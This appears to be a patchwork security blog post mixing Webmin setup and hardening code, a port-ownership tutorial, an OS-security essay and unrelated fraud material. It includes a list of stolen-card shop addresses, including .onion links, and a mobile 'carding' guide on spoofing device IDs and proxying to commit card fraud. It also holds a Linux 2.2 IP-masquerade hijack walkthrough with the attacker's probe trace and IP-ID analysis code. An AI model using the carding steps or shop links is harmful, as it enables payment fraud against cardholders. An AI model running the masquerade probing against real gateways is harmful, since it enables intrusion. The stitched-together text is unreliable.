Compared with other GUI management tools, Webmin has the following significant advantages:
1) Web-based management gives Webmin both local and remote management capability;
2) A plug-in structure makes Webmin highly extensible. The standard modules shipped with Webmin already cover most common Unix administration tasks, and third-party modules continue to be developed;
3) Access control and SSL support provide adequate security for remote management;
4) Internationalization support, with versions in several languages.
Installing Webmin
Some Linux distributions ship with Webmin pre-installed, such as OpenLinux. If Webmin is not included in your distribution, you can download Webmin's RPM package or tarball and install it yourself.
written by undercode
The following are the installation steps for the tarball:
1) Webmin requires Perl 5 (the original text specifies 5.006 or later). If Perl is not installed on the target system, download and install it from http://www.cpan.org together with the commonly used Perl modules. If you want Webmin to support SSL, also install OpenSSL and the Perl module Net::SSLeay.
2) Download webmin-0.91.tar.gz from http://www.webmin.com/webmin.
3) Unpack webmin-0.91.tar.gz into the directory where you want Webmin installed, such as /usr/local/webmin.
4) Run the installation script setup.sh from that directory. It asks for the Webmin configuration directory, the log directory, the port to listen on (default 10000), and an administrator login and password. The script also installs Webmin as a system daemon that starts automatically at boot.
5) Start Webmin (setup.sh offers to start it when it finishes) or reboot, then visit http://localhost:10000. If the Webmin login page appears, the installation succeeded.
Using Webmin for UNIX system administration
As already mentioned, every management function is plugged into Webmin as a module. Webmin groups modules into categories; the main ones are Webmin, System, Servers, Hardware and Others. After you log in and reach the Webmin home page, these categories are shown as separate tabs. (The original article shows a screenshot of a Webmin server's home page here.)
Management of Webmin itself mainly covers:
1) Module management: installing, deleting and cloning a module, and changing a module's category. Webmin can also upgrade itself directly from the Internet.
2) Theme management: Webmin ships several interface themes; version 0.91 provides KDE and Caldera themes. A theme is itself a module, so new themes can be installed. You can also change interface parameters such as the page background colour and table background colour.
3) Internationalization: a notable feature of Webmin is its multi-language support. Languages supported at the time of writing include English, French, German, Italian, Chinese, Japanese and Korean, among others.
4) Webmin servers index: Webmin can discover and manage other Webmin servers, which is very convenient when administering several UNIX servers at once.
5) Actions log: Webmin's actions log is used to audit system administration activity.
Securing Webmin (and with it, your system)
Because Webmin is a web-based management tool that runs as root, the security of Webmin itself matters a great deal. Webmin's security rests on three mechanisms:
1) SSL support: once Webmin is configured for SSL, you access it over https. SSL authenticates your Webmin server to you and encrypts the management traffic on the wire.
2) User access control: lets the administrator control which Webmin users may access each module, and what operations a user who has access to a module may perform within it.
3) IP access control: restricts which IP addresses may connect to the Webmin server at all; connections from addresses not on the allow list are refused.
With these controls in place Webmin can be used as a reasonably safe system-management tool. Note that SSL only protects the transport: the accounts, the access lists and the Webmin version itself still have to be kept current.
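As an added example (not part of the original article or of the Webmin project), the following Python script audits a miniserv.conf for the SSL and IP-access-control settings just described and writes a hardened copy. The keys ssl, allow, deny and port are real miniserv.conf keys; the sample config text is constructed for this example, and the CIDR form of the allow= value is assumed to match what current Webmin versions accept.

```python
"""Audit a Webmin miniserv.conf for transport encryption and IP access
control, then produce a hardened copy.  Added example; the config text
below is constructed, not taken from a real server."""

WEAK_CONF = """\
# constructed sample: fresh install, SSL off, no address restriction
port=10000
root=/usr/local/webmin
ssl=0
"""


def parse_miniserv(text):
    """miniserv.conf is a flat key=value file; comments start with '#'."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit_miniserv(text):
    """Return a list of findings; an empty list means the controls the
    article describes (SSL on, source-address restriction) are present."""
    conf = parse_miniserv(text)
    findings = []
    if conf.get("ssl") != "1":
        findings.append("ssl is not enabled: logins and session cookies travel in clear text")
    if not conf.get("allow") and not conf.get("deny"):
        findings.append("no allow/deny list: any source address may attempt to log in")
    allowed = conf.get("allow", "").split()
    if any(a in ("0.0.0.0/0", "*") for a in allowed):
        findings.append("allow list permits every address")
    return findings


def harden_miniserv(text, allowed_sources):
    """Copy of the config with ssl=1 and allow=<sources> (assumed CIDR list),
    replacing existing ssl/allow lines and leaving everything else alone."""
    out, seen = [], set()
    for line in text.splitlines():
        key = line.partition("=")[0].strip()
        if key == "ssl":
            out.append("ssl=1")
            seen.add("ssl")
        elif key == "allow":
            out.append("allow=" + " ".join(allowed_sources))
            seen.add("allow")
        else:
            out.append(line)
    if "ssl" not in seen:
        out.append("ssl=1")
    if "allow" not in seen:
        out.append("allow=" + " ".join(allowed_sources))
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for finding in audit_miniserv(WEAK_CONF):
        print("FINDING:", finding)
    fixed = harden_miniserv(WEAK_CONF, ["192.168.1.0/24", "10.0.0.5"])
    print(fixed)
    print("findings after hardening:", audit_miniserv(fixed))
```

The per-user, per-module access control of point 2 lives elsewhere (webmin.acl and the per-module ACL files under the Webmin config directory), so this script deliberately covers only the listener-level settings; run it against /etc/webmin/miniserv.conf and restart Webmin after applying the hardened copy.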
SCAMMER CC SELLER SITE LIST
All of these sites sell cards that are around 95% dead.
Scammer sites (don't open them):
uniccshop.bazar
BANKOMAT
Normal link: Bankomat.cc
Tor link: https://bankomatccor3gum.onion
UNICC
Normal link: Unicc.cm / (important) uniccshop.bazar/
Tor link: Uniccxide6hker6y.onion
valcc.bazar
VALIDCC
Normal link: Validcc.name
Normal link: Validcc.vc
Normal link: Validcc.tw
Normal link: Validcc.bz
Tor link: VALIDCVVMTWP25N5.ONION
Tor link: VALIDCCVLSSFDGAS.ONION
Tor link: HU5IYZFPEYIFE46M.ONION
FESHOP
Normal link: http://fe-acc18.ru/store/index.php
Normal link: FE-ACC18.RU
Tor link: hdjd6wv7hjngjhkb.onion
JSTASH
Normal link: jstash.bazar/
Network configuration: what is listening on a port?
When running netstat -an you sometimes see output like:
udp        0      0 0.0.0.0:32768           0.0.0.0:*
but /etc/services has no entry for that port. What should you do? Is it a hacker's program? Is there a way to see which program is listening on the port?
Use lsof -i :32768 to find out:
COMMAND    PID USER   FD   TYPE DEVICE SIZE NODE NAME
rpc.statd  603 root    4u  IPv4    953      UDP *:32768
rpc.statd  603 root    6u  IPv4    956      TCP *:32768 (LISTEN)
So it turns out to be an RPC program (rpc.statd, the NFS lock status daemon).
In general, lsof -i :PORT shows the program bound to the given port together with its current connections. (netstat -anp, or ss -lnp on newer systems, gives the same PID/program mapping.)
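The join that lsof -i performs for you, written out as an added example rather than anything from the original post: read the port's socket rows from /proc/net/udp and /proc/net/tcp (hex address:port, socket inode in the tenth column), then find the process holding that inode by scanning /proc/<pid>/fd. The sample table text is constructed to mirror the rpc.statd case above (port 0x8000 = 32768, inode 953); the live lookup needs Linux and normally root to read other users' fd directories.

```python
"""Map a listening port to its owning process using /proc only.
Added example; SAMPLE_UDP is constructed to resemble /proc/net/udp."""
import os
import socket
import struct

# Constructed /proc/net/udp excerpt: port 0x8000 (32768) with inode 953,
# plus a DNS stub resolver on 127.0.0.1:53 for contrast.
SAMPLE_UDP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
   3: 00000000:8000 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 953 2 c1a0f000 0
   7: 0100007F:0035 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 1102 2 c1a0f400 0
"""


def _hex_addr(field):
    """'0100007F:0035' -> ('127.0.0.1', 53); the IPv4 address is little-endian hex."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net(text, port):
    """Return (local_ip, local_port, inode) for each IPv4 socket row bound to port."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split()
        if len(fields) < 10:
            continue
        ip, local_port = _hex_addr(fields[1])
        if local_port == port:
            rows.append((ip, local_port, int(fields[9])))
    return rows


def socket_owners(inode):
    """PIDs whose fd table contains 'socket:[inode]' (what lsof's NODE column joins on)."""
    pids = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        fd_dir = f"/proc/{pid}/fd"
        try:
            for fd in os.listdir(fd_dir):
                try:
                    if os.readlink(f"{fd_dir}/{fd}") == f"socket:[{inode}]":
                        pids.append(int(pid))
                        break
                except OSError:
                    continue
        except OSError:                          # not our process, or it exited
            continue
    return pids


def who_listens(port, protos=("tcp", "udp")):
    """Live lookup: (proto, ip, port, pid, command) for every socket on port."""
    found = []
    for proto in protos:
        try:
            with open(f"/proc/net/{proto}") as fh:
                text = fh.read()
        except OSError:
            continue
        for ip, p, inode in parse_proc_net(text, port):
            for pid in socket_owners(inode):
                try:
                    with open(f"/proc/{pid}/comm") as fh:
                        comm = fh.read().strip()
                except OSError:
                    comm = "?"
                found.append((proto, ip, p, pid, comm))
    return found


if __name__ == "__main__":
    print("sample table, port 32768:", parse_proc_net(SAMPLE_UDP, 32768))
    print("live, port 32768:", who_listens(32768))
```

If the live lookup returns an inode but no owning PID, the socket belongs to a process whose fd directory you cannot read (run as root) or, more rarely, to a kernel-side socket such as an in-kernel NFS or RPC service; that is also exactly the case where a userland rootkit hiding a process from lsof would show up as an orphan inode.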
Requirements for carding from a mobile phone:
A) A rooted phone.
B) Install the following apps:
1. IMEI changer
2. Phone ID changer
3. Android ID changer
4. Proxy Droid
5. CCleaner
Procedure:
> Use a SOCKS5 proxy with the Proxy Droid app.
> Change the IMEI, Android ID, etc. before you start carding.
> Use CCleaner to clean up the Android device, then connect Proxy Droid to your SOCKS5 proxy.
> Then follow all the steps of the carding tutorials as you would on a PC, with the above in place.
> Ok, so you have your CC and your drop; be as anonymous as you can make yourself.
How to evaluate OS security
---- With the growth of networking, enterprises are connecting their local area networks to wide area networks, or their internal networks to the Internet. This gives more and more people, internal and external, access to internal network resources, and with that exposure companies urgently need to address network security.
---- A major part of providing effective security is evaluating how well the existing security mechanisms implement the enterprise's network security policy, that is, judging whether the policy is actually enforced. The growing complexity of networks makes enforcing security policy harder and harder.
---- Evaluating the effectiveness of each security component is necessary to ensure effective network security. The two main components that provide network security are the firewall and the operating system (OS).
---- Many companies put their energy into the firewall, yet according to a report by Aberdeen Group the most easily overlooked vulnerabilities are those in the operating environment. A few vendors offer trusted, hardened versions of the operating environment; most only offer optional, installable security services.
---- The operating system's security mechanisms protect the machine running the OS from unauthorized access, and in particular guard specific data, privileged machine instructions and UNIX superuser operations. Most firewalls, and the Internet itself, are built on standard, unhardened UNIX environments, which is why nobody is surprised that security threats exist: UNIX is hard to configure securely, and configuration mistakes create vulnerabilities.
---- Two factors make OS security mechanisms especially important:
---- (1) They provide a second line of defense behind the firewall. Attackers often break through or bypass firewalls; OS security policy can still protect the system against such external intruders.
---- (2) They defend against intruders inside the enterprise. Internal intruders are already behind the firewall, and the FBI report cited by the original indicates that more than 60% of computer crime originates inside the enterprise, in most cases from disgruntled employees or contractors.
---- Evaluating OS security is quite difficult, especially for UNIX, because of its many variants and vendors. Assessing a UNIX system's security requires mastering three areas:
---- (1) UNIX system configuration;
---- (2) Weaknesses in the various versions of UNIX network applications, including sendmail, FTP, NFS (Network File System) and TFTP (Trivial File Transfer Protocol);
---- (3) The security patches provided by each vendor.
---- The operating system is constantly being patched and gaining features, which makes evaluation more complicated, and these updates themselves introduce new vulnerabilities. What is needed is a way to evaluate operating-system vulnerabilities automatically and to enforce security policy automatically. Only then can the gap between security policy and security implementation be measured and closed.
---- OS security scanning provides exactly that. The scanner runs on each machine and probes it with a series of tests to dig out potential weaknesses. It evaluates the host's security from the operating system's perspective, produces a detailed report of the vulnerabilities it finds, and proposes fixes.
---- System Security Scanner (S3) from ISS is one such host-based assessment tool; it eases the management and enforcement of security policy and lets companies apply one policy across heterogeneous platforms. At the time of writing S3 supported most popular UNIX versions, including Linux, SunOS 4.1.3, Solaris, HP-UX and AIX, and automated security assessment and maintenance of those platforms. With such a tool a company can make full use of its network's potential and keep strengthening its competitiveness without being held back by security worries.
SECURITY KERNEL TIPS
1) The kernel's IP masquerading has a security hole
The IP masquerading implementation in the Linux 2.2.x kernel has a serious vulnerability: the relevant kernel code does not check incoming packets against the recorded connection strictly enough, so an attacker can rewrite a UDP masquerade entry in the kernel and have their own UDP packets routed to an internal machine.
2) When an internal host sends a UDP packet to an external DNS server and the packet passes through the masquerading gateway, the kernel adds an entry recording the connection. For example, for a UDP packet from port 1035 of internal host A to port 53 of external host C, the kernel replaces the packet's source address with the gateway's (B) address and its source port with a masquerade port, by default from the range 61000 to 65096, so in theory the kernel can handle 4096 TCP/UDP masqueraded connections at once:
Host A:1035 -> GW B:63767 -> Host C:53
3) When a UDP packet arrives at the masquerading gateway from the outside, Linux IP masquerading decides whether to forward it to the internal network based only on the destination port. If the destination port matches an entry in the masquerade table, the kernel forwards the packet and updates the entry's remote address and port to the packet's source address and port. So once an attacker has identified a masquerade port in use on the gateway, they can overwrite that entry's remote side with their own IP and port. Because the masquerade port range is normally 61000 to 65096, an external attacker can easily determine which ports are in use: send UDP probes to those ports on the gateway and compare the IP ID field of the ICMP port-unreachable replies. Each packet a host sends increments the IP ID counter in its TCP/IP stack, so the ICMP reply for a port that is in use for masquerading carries the IP ID of the internal host rather than the gateway's.
4) That ID usually differs a lot from the gateway's current IP ID, typically by more than 1000. The following example shows the exploitation process:
Host A is an internal host (192.168.1.100)
Host B is the masquerading gateway (192.168.1.1 / 10.0.0.1)
Host C is an external DNS server (10.0.0.25)
Host X is the external attacker (10.10.187.13)
Before probing, run ipchains -L -M -n on the masquerading gateway to display the current masquerade table:
> UDP 03:39.21 192.168.1.100 10.0.0.25 1035 (63767) -> 53
There is currently one connection from 192.168.1.100 port 1035 to 10.0.0.25 port 53, with masquerade port 63767.
[tcpdump output on the attacker's machine]
(To make the problem easier to see, the source port of all probe packets is set to 12345.)
[The probing starts at port 61000; some earlier results are omitted.]
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63762 unreachable [tos 0xd8] (ttl 245, id 13135)
10.10.187.13.12345 > 10.0.0.1.63763: udp 0 (DF) [tos 0x18] (ttl 254, id 23069)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63763 unreachable [tos 0xd8] (ttl 245, id 13136)
10.10.187.13.12345 > 10.0.0.1.63764: udp 0 (DF) [tos 0x18] (ttl 254, id 23070)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63764 unreachable [tos 0xd8] (ttl 245, id 13137)
10.10.187.13.12345 > 10.0.0.1.63765: udp 0 (DF) [tos 0x18] (ttl 254, id 23071)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)
10.10.187.13.12345 > 10.0.0.1.63766: udp 0 (DF) [tos 0x18] (ttl 254, id 23074)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)
10.10.187.13.12345 > 10.0.0.1.63767: udp 0 (DF) [tos 0x18] (ttl 254, id 23083)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63767 unreachable [tos 0xd8] (ttl 244, id 17205)
                                                                                         ^^^^^^^^
The IP ID of this reply is 17205, which differs from the previous reply's 13139 by more than 4000 (note also the TTL of 244, one hop further away than the gateway's 245): we have found a masqueraded connection!
10.10.187.13.12345 > 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140)
10.10.187.13.12345 > 10.0.0.1.63769: udp 0 (DF) [tos 0x18] (ttl 254, id 23088)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63769 unreachable [tos 0xd8] (ttl 245, id 13141)
10.10.187.13.12345 > 10.0.0.1.63770: udp 0 (DF) [tos 0x18] (ttl 254, id 23090)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63770 unreachable [tos 0xd8] (ttl 245, id 13142)
10.10.187.13.12345 > 10.0.0.1.63771: udp 0 (DF) [tos 0x18] (ttl 254, id 23091)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63771 unreachable [tos 0xd8] (ttl 245, id 13143)
10.10.187.13.12345 > 10.0.0.1.63772: udp 0 (DF) [tos 0x18] (ttl 254, id 23092)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63772 unreachable [tos 0xd8] (ttl 245, id 13144)
[The probing ends at port 65096; some results are omitted.]
Now look at the masquerade table on the gateway again:
ipchains -L -M -n
> UDP 04:35.12 192.168.1.100 10.10.187.13 1035 (63767) -> 12345
The remote host has been replaced by the attacker's IP, 10.10.187.13, and the remote port by the source port the attacker used for probing, 12345.
The attacker can now send UDP data from source port 12345 through masquerade port 63767 to port 1035 on the internal host.
Suggestion:
One way to handle the external-DNS case is to run a caching name server on the masquerading gateway itself and then stop masquerading UDP packets altogether, so that no UDP masquerade entries exist to be hijacked. Upgrading to a kernel that has fixed this check is of course the real remedy.
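As an added example (not from the original post and not the kernel's code), the following Python models the UDP masquerade-table lookup the text describes, in its vulnerable form and with the source check a correct lookup needs, and applies the attacker's IP-ID analysis to the ICMP replies. The table fields and the trace lines are taken from the article's own output above; the function names, the dataclass and the shape of the fix are this example's own assumptions.

```python
"""Model of the 2.2.x UDP masquerade lookup described in the text, plus the
IP-ID outlier test an attacker runs over tcpdump output.  Added example;
the TRACE excerpt is copied from the article's probe output."""
import re
from dataclasses import dataclass


@dataclass
class MasqEntry:
    src_ip: str         # internal host
    src_port: int
    remote_ip: str      # external peer the internal host talked to
    remote_port: int
    masq_port: int      # port the gateway substituted, from 61000-65096


def lookup_vulnerable(table, dst_port, src_ip, src_port):
    """Behaviour the article describes: match on the destination (masquerade)
    port alone, then overwrite the entry's remote side with the sender."""
    for entry in table:
        if entry.masq_port == dst_port:
            entry.remote_ip, entry.remote_port = src_ip, src_port
            return entry
    return None


def lookup_checked(table, dst_port, src_ip, src_port):
    """Hardened lookup (this example's fix): the sender must be the peer the
    entry was created for, so a stranger's packet matches nothing."""
    for entry in table:
        if (entry.masq_port, entry.remote_ip, entry.remote_port) == (dst_port, src_ip, src_port):
            return entry
    return None


# "udp port 63767 unreachable [tos 0xd8] (ttl 244, id 17205)"
ICMP_UNREACH = re.compile(r"udp port (\d+) unreachable .*?\bid (\d+)\)")


def find_masq_ports(tcpdump_text, threshold=1000):
    """Ports whose ICMP port-unreachable reply carried an IP ID far from the
    gateway's running counter: those replies were generated by the internal
    host behind the masquerade entry, not by the gateway."""
    replies = [(int(m.group(1)), int(m.group(2)))
               for m in (ICMP_UNREACH.search(line) for line in tcpdump_text.splitlines())
               if m]
    hits, gateway_id = [], None
    for port, ip_id in replies:
        if gateway_id is not None and abs(ip_id - gateway_id) > threshold:
            hits.append(port)        # outlier: another host's counter
        else:
            gateway_id = ip_id       # the gateway's own reply advances the baseline
    return hits


# Excerpt of the article's trace: attacker 10.10.187.13 probing gateway 10.0.0.1.
TRACE = """\
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63765 unreachable [tos 0xd8] (ttl 245, id 13138)
10.10.187.13.12345 > 10.0.0.1.63766: udp 0 (DF) [tos 0x18] (ttl 254, id 23074)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63766 unreachable [tos 0xd8] (ttl 245, id 13139)
10.10.187.13.12345 > 10.0.0.1.63767: udp 0 (DF) [tos 0x18] (ttl 254, id 23083)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63767 unreachable [tos 0xd8] (ttl 244, id 17205)
10.10.187.13.12345 > 10.0.0.1.63768: udp 0 (DF) [tos 0x18] (ttl 254, id 23084)
10.0.0.1 > 10.10.187.13: icmp: 10.0.0.1 udp port 63768 unreachable [tos 0xd8] (ttl 245, id 13140)
"""


def demo():
    """Run the analysis, then replay the attacker's packet against both lookups."""
    ports = find_masq_ports(TRACE)                                   # [63767]
    vulnerable = [MasqEntry("192.168.1.100", 1035, "10.0.0.25", 53, 63767)]
    hijacked = lookup_vulnerable(vulnerable, ports[0], "10.10.187.13", 12345)
    checked = [MasqEntry("192.168.1.100", 1035, "10.0.0.25", 53, 63767)]
    refused = lookup_checked(checked, ports[0], "10.10.187.13", 12345)
    return ports, hijacked, refused


if __name__ == "__main__":
    ports, hijacked, refused = demo()
    print("masqueraded ports found by IP-ID analysis:", ports)
    print("vulnerable lookup rewrote the entry's remote side to:",
          hijacked.remote_ip, hijacked.remote_port)
    print("checked lookup result for the attacker's packet:", refused)
```

The IP-ID test only works because the 2.2-era stack used a single global, incrementing IP ID counter, which is also why the same trick serves as a generic idle-host or NAT-detection technique; stacks with per-destination or randomized IDs defeat it.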